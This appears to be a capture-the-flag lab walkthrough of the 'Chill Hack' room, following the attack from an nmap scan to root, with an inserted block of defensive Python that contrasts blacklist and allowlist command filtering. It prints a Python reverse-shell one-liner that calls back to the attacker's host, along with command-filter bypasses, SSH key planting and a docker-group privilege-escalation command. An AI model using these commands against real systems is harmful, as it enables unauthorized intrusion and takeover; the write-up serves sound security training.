Chill Hack
First let’s run nmap.
Nmap scan report for 10.10.102.170
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.13.24.61
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09f95db918d0b23a822d6e768cc20144 (RSA)
| 256 1bcf3a498b1b20b02c6aa551a88f1e62 (ECDSA)
|_ 256 3005cc52c66f6504860f7241c8a439cf (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 7EEEA719D1DF55D478C68D9886707F17
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Game Info
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 19:09
Completed NSE at 19:09, 0.00s elapsed
Initiating NSE at 19:09
Completed NSE at 19:09, 0.00s elapsed
Initiating NSE at 19:09
Completed NSE at 19:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.69 seconds
Since we have a webserver let’s view the site.
I’ll also search for directories using Gobuster.
While that was running I noticed the anonymous FTP login in the nmap output. I checked it out, found note.txt and read its contents. What command is Apaar referring to?
Let’s check robots.txt. Nothing notable.
I found /secret from my Gobuster scan so I’ll check that out. Looks like I can enter commands. Unacceptable commands are met with an alert. Is this what Apaar was referring to?
Acceptable commands are met with a cute little worker and give us the results of ‘whoami’.
So the commands are filtered, but banned commands can still be run by escaping them with ‘\’. We get some listings.
The ‘find’ command is acceptable. I wonder if I can append other commands to the allowed command.
I’ll try adding a reverse shell to the find command as shown below.
find /usr/bin/python3 -exec {} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.24.61",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;
I set up a listener and receive a shell!
It appears I am viewing the files for the website. Based on index.php there are many commands that are blacklisted.
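The two bypasses described above (a backslash-escaped command name, and -exec appended to the allowed find) both come down to the page checking a blacklist of words over text that is then handed to a shell. The added example below is not code from the room; it contrasts such a check with an allowlist that parses the input as argv, refuses find's action primaries and never invokes a shell. The blacklist contents and the allowed flags are assumed for illustration.

```python
import shlex
import subprocess

# Constructed word blacklist, in the spirit of the index.php filter the
# writeup describes; the real list is not reproduced here (hypothetical).
BLACKLIST = {"nc", "python3", "bash", "sh", "cat", "head"}

def blacklist_check(cmd: str) -> bool:
    """Weak check: passes unless a banned word appears as its own token."""
    return not any(word in BLACKLIST for word in cmd.split())

# Hardened form: exact allowlist of commands, a per-command flag allowlist
# (assumed for illustration), a strict argument alphabet, and find's action
# primaries refused outright. Nothing here ever reaches /bin/sh.
ALLOWED = {"whoami": set(), "id": set(), "find": {"-name", "-type", "-maxdepth"}}
FIND_ACTIONS = {"-exec", "-execdir", "-ok", "-okdir", "-delete", "-fprint", "-fprintf", "-fls"}
ARG_CHARS = set("/._-*")

def allowlist_check(cmd: str) -> bool:
    """Parse as argv (no shell) and accept only exactly what is allowed."""
    try:
        argv = shlex.split(cmd)  # resolves '\cat' to 'cat', so the escape gains nothing
    except ValueError:
        return False             # unbalanced quotes etc.
    if not argv or argv[0] not in ALLOWED:
        return False
    for arg in argv[1:]:
        if arg in FIND_ACTIONS:
            return False         # no -exec and friends, even on an allowed find
        if arg.startswith("-") and arg not in ALLOWED[argv[0]]:
            return False
        if not all(c.isalnum() or c in ARG_CHARS for c in arg):
            return False         # rejects ; | & $ ` { } and whitespace
    return True

def run_checked(cmd: str) -> str:
    """Run an allowlisted command as argv, never through a shell."""
    if not allowlist_check(cmd):
        raise PermissionError(f"rejected: {cmd!r}")
    proc = subprocess.run(shlex.split(cmd), shell=False, capture_output=True, text=True, timeout=5)
    return proc.stdout
```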
Let’s see if I can escalate my privileges. There’s a script called helpline that I can run as root.
Let’s view the script.
If not properly filtered I could inject a command and escalate privileges. Inserting /bin/bash allows us to switch to the apaar user.
Let’s look around. We see a file and it happens to contain our first flag!
I can’t seem to move around so I will need to escalate privileges.
I ran Linpeas.
I see ports 3306 and 9001 that can only be accessed locally. Let’s try port forwarding. Since we have full privileges on the .ssh directory I can create my own keys and add the public key to ‘authorized_keys’.
Now I can do a port forward for 9001.
Now I can see another website on port 9901.
Looking around I found the second website’s files.
Looking at the account.php we can see that the script performs raw SQL queries without doing any proper filtering or sanitization on user input.
I found credentials in the website’s code.
There’s also a clue in hacker.php.
Since it relates to hacker-with-laptop_23–2147985341.jpg let’s take a closer look.
Running steghide gives me ‘backup.zip’.
It is password-protected so I will try to crack it with john. Now I have a password.
Let’s check out the file.
I found a credential for Anurodh. It appears to be base64 encoded.
Decoding it gives us a password!
Now I can switch to Anurodh and see what privileges they have.
They are part of the docker group. Checking GTFOBins I see the following command I could run to gain root privileges.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Now I am root! The only file is proof.txt. Surely this is our flag.
And there it is!